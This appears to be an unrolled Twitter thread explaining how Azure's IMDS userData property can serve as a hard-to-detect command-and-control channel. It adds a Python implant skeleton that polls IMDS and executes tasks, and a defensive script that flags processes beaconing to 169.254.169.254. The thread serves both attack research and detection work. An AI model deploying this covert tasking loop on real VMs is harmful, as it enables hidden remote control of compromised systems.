There are two very interesting new cmdlets in this release:

Invoke-AzureVMUserDataCommand and Invoke-AzureVMUserDataAgent.

In this thread I'll offer my thoughts on how these can be used for extremely hard-to-detect #Azure c2:
This c2 technique is based on Azure IMDS: docs.microsoft.com/en-us/azure/vi….

This service is accessible to every VM in Azure. As far as I know, there's no reason to ever disable this service for a VM, so it should always be accessible to every Azure VM.
IMDS's REST API is available to each VM at the link-local, non-routable address 169.254.169.254.

In April of this year, Microsoft introduced an IMDS feature called "User Data": azure.microsoft.com/en-us/updates/…
This feature allows anyone with write access to the VM object to write to a property called userData. This property must be base64-encoded text, limited to 87,384 characters (64 KiB of raw data, plus the base64 overhead).
The VM itself can read this property, but can't write to it by default. With enough privilege you can grant the VM or anyone else write access to the VM object and therefore the userData property.
Ok. Why is this interesting? This is interesting to me because the IMDS API is *always* available to the Azure VM, regardless of whatever firewall rules you have set up for the VM, the VPC, etc.

Even if the VM is "100% isolated", you can still talk to it through this property.
The Azure substrate and the various services involved will carry your c2 messages for you regardless of firewall rules. (Diagram in the original tweet: C2 traffic in yellow, authentication traffic in purple.)
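To make the channel concrete, here is an added example (mine, not the thread's and not MicroBurst's code) of the two halves of a userData tasking loop: the operator writes a base64 task into the VM object's userData property, and the agent on the VM reads it back through IMDS, runs it once, and tries to post a result into the same property. The JSON message shape, the handler map, and the in-memory FakeVmObject standing in for the ARM VM resource are my assumptions so the script runs offline; the IMDS URL, the Metadata header, and the 87,384-character limit from the thread are real. The write-back path fails with PermissionError unless the VM identity has been granted write on the VM object, which is the default posture the thread describes.

```python
"""Added example: an IMDS user-data tasking channel, operator and agent side.

Both sides are exercised against an in-memory stand-in for the VM object so
this runs anywhere; fetch_user_data_from_imds() is the real read path on a VM.
"""
import base64
import json
import urllib.request

# Limit quoted in the thread: 87,384 base64 characters, i.e. 64 KiB
# (65,536 bytes) of raw data before encoding.
USER_DATA_MAX_RAW_BYTES = 65_536
USER_DATA_MAX_B64_CHARS = 87_384

# Real IMDS endpoint; api-version 2021-01-01 is the first that exposes userData.
IMDS_USER_DATA_URL = (
    "http://169.254.169.254/metadata/instance/compute/userData"
    "?api-version=2021-01-01&format=text"
)


def fits_user_data(task: dict) -> bool:
    """True if the serialized task fits the raw-size cap of the property."""
    return len(json.dumps(task, separators=(",", ":")).encode()) <= USER_DATA_MAX_RAW_BYTES


def encode_user_data(task: dict) -> str:
    """Serialize a task to the base64 string Azure expects, enforcing the cap."""
    if not fits_user_data(task):
        raise ValueError(f"task exceeds {USER_DATA_MAX_RAW_BYTES} raw bytes")
    b64 = base64.b64encode(json.dumps(task, separators=(",", ":")).encode()).decode("ascii")
    assert len(b64) <= USER_DATA_MAX_B64_CHARS
    return b64


def decode_user_data(b64: str) -> dict:
    """Inverse of encode_user_data; IMDS with format=text returns the raw base64."""
    return json.loads(base64.b64decode(b64, validate=True))


def fetch_user_data_from_imds(timeout: float = 2.0) -> str:
    """Production read path on the VM: one GET to IMDS with the mandatory header."""
    req = urllib.request.Request(IMDS_USER_DATA_URL, headers={"Metadata": "true"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:  # only works on an Azure VM
        return resp.read().decode("ascii")


class FakeVmObject:
    """Assumed stand-in for the ARM VM resource: a userData property plus an ACL flag."""

    def __init__(self, agent_can_write: bool = False):
        self.user_data = ""
        self.agent_can_write = agent_can_write

    def operator_write(self, b64: str) -> None:   # operator has write on the VM object
        self.user_data = b64

    def operator_read(self) -> str:               # operator reads results back via ARM
        return self.user_data

    def imds_read(self) -> str:                   # what the VM sees at 169.254.169.254
        return self.user_data

    def agent_write(self, b64: str) -> None:      # needs write granted to the VM identity
        if not self.agent_can_write:
            raise PermissionError("VM identity lacks write on the VM object")
        self.user_data = b64


class Agent:
    """Implant side: poll IMDS, run each task id once, try to post the result back."""

    def __init__(self, read, write, handlers):
        self.read, self.write, self.handlers = read, write, handlers
        self.seen = set()
        self.results = {}

    def poll(self):
        b64 = self.read()
        if not b64:
            return None
        msg = decode_user_data(b64)
        if msg.get("type") != "task" or msg["id"] in self.seen:
            return None  # userData persists across polls: never re-run the same task
        self.seen.add(msg["id"])
        handler = self.handlers.get(msg["cmd"])
        out = handler(*msg.get("args", [])) if handler else f"unknown cmd {msg['cmd']!r}"
        self.results[msg["id"]] = out
        try:
            self.write(encode_user_data({"type": "result", "id": msg["id"], "out": out}))
            return "posted"
        except PermissionError:
            return "executed, no write-back"  # default posture: VM can read, not write
```

Two things the skeleton makes visible that the prose does not: the agent must de-duplicate on task id because the property does not clear itself after a read, and the operator only gets results back if someone has granted the VM's identity write access to its own VM object.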
This c2 method might be very difficult to detect if you are only relying on network telemetry, as I don't believe you can get between the Azure VM and IMDS. Maybe you can set up a "span" port in the VPC to collect this traffic? Not sure. Anyone know?
At the host level, @Haus3c has some good info at the bottom of this post, which covers much of the same stuff I just said in this thread: hausec.com/2021/12/03/abu…
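Since the VNet never sees IMDS traffic but the guest OS does, the practical place to look is endpoint telemetry on the VM. As an added example (mine, not from the thread or the hausec post), this scores constructed Sysmon-style network-connection records and flags processes talking to 169.254.169.254 that are not in an allow-list of expected Azure guest-agent binaries, marking callers whose connection gaps are regular enough to look like a poll loop. The allow-list and the sample records are assumptions for illustration, not a vetted baseline or real telemetry; build your own baseline per image, and remember an implant hosted inside an allow-listed process will pass this check.

```python
"""Added example: host-side triage of which processes call IMDS.

Input is constructed Sysmon Event ID 3 (network connection) records already
parsed into dicts; the allow-list is an illustrative assumption.
"""
from datetime import datetime
from statistics import pstdev

IMDS_IP = "169.254.169.254"

# Assumption for illustration: binaries that legitimately talk to IMDS on a
# stock Azure Windows image. Baseline your own fleet before relying on this.
EXPECTED_IMDS_CALLERS = {"windowsazureguestagent.exe", "waappagent.exe", "collectguestlogs.exe"}

# Constructed records, not real telemetry.
SAMPLE_EVENTS = [
    {"UtcTime": "2021-12-22 10:00:00", "Image": r"C:\WindowsAzure\GuestAgent_2.7.41491.1071\WindowsAzureGuestAgent.exe",
     "User": r"NT AUTHORITY\SYSTEM", "DestinationIp": IMDS_IP, "DestinationPort": 80},
    {"UtcTime": "2021-12-22 10:00:05", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "User": r"CORP\svc_build", "DestinationIp": IMDS_IP, "DestinationPort": 80},
    {"UtcTime": "2021-12-22 10:00:35", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "User": r"CORP\svc_build", "DestinationIp": IMDS_IP, "DestinationPort": 80},
    {"UtcTime": "2021-12-22 10:01:05", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "User": r"CORP\svc_build", "DestinationIp": IMDS_IP, "DestinationPort": 80},
    {"UtcTime": "2021-12-22 10:01:10", "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "User": r"CORP\jdoe", "DestinationIp": "13.107.42.14", "DestinationPort": 443},
    {"UtcTime": "2021-12-22 10:01:35", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "User": r"CORP\svc_build", "DestinationIp": IMDS_IP, "DestinationPort": 80},
    {"UtcTime": "2021-12-22 10:02:00", "Image": r"C:\Users\Public\svc.exe",
     "User": r"CORP\svc_build", "DestinationIp": IMDS_IP, "DestinationPort": 80},
]


def _basename(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def triage_imds_callers(events, min_beacons: int = 3, jitter_tolerance: float = 0.25):
    """Group IMDS connections by image, drop expected callers, and mark the rest.

    'periodic' is set when at least min_beacons connections exist and the
    standard deviation of the gaps is within jitter_tolerance of the mean gap,
    the signature of a fixed-interval poll loop against the userData property.
    """
    by_image = {}
    for e in events:
        if e.get("DestinationIp") != IMDS_IP:
            continue  # only IMDS traffic is of interest here
        by_image.setdefault(e["Image"], []).append(e)

    alerts = []
    for image, hits in by_image.items():
        if _basename(image) in EXPECTED_IMDS_CALLERS:
            continue
        times = sorted(datetime.strptime(h["UtcTime"], "%Y-%m-%d %H:%M:%S") for h in hits)
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean_gap = sum(gaps) / len(gaps) if gaps else None
        periodic = (
            len(times) >= min_beacons
            and mean_gap > 0
            and pstdev(gaps) <= jitter_tolerance * mean_gap
        )
        alerts.append({
            "image": image,
            "user": hits[0]["User"],
            "count": len(hits),
            "periodic": periodic,
            "mean_gap_s": round(mean_gap, 1) if mean_gap is not None else None,
        })
    return alerts
```

On the sample data the guest agent is ignored, the browser never reaches IMDS, the PowerShell host is flagged with a clean 30-second cadence, and the one-off svc.exe call is flagged without the periodic marker, which is the kind of distinction that lets you rank findings rather than page on every IMDS touch.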

Thread by Andy Robbins (@_wald0), unrolled with ThreadReaderApp.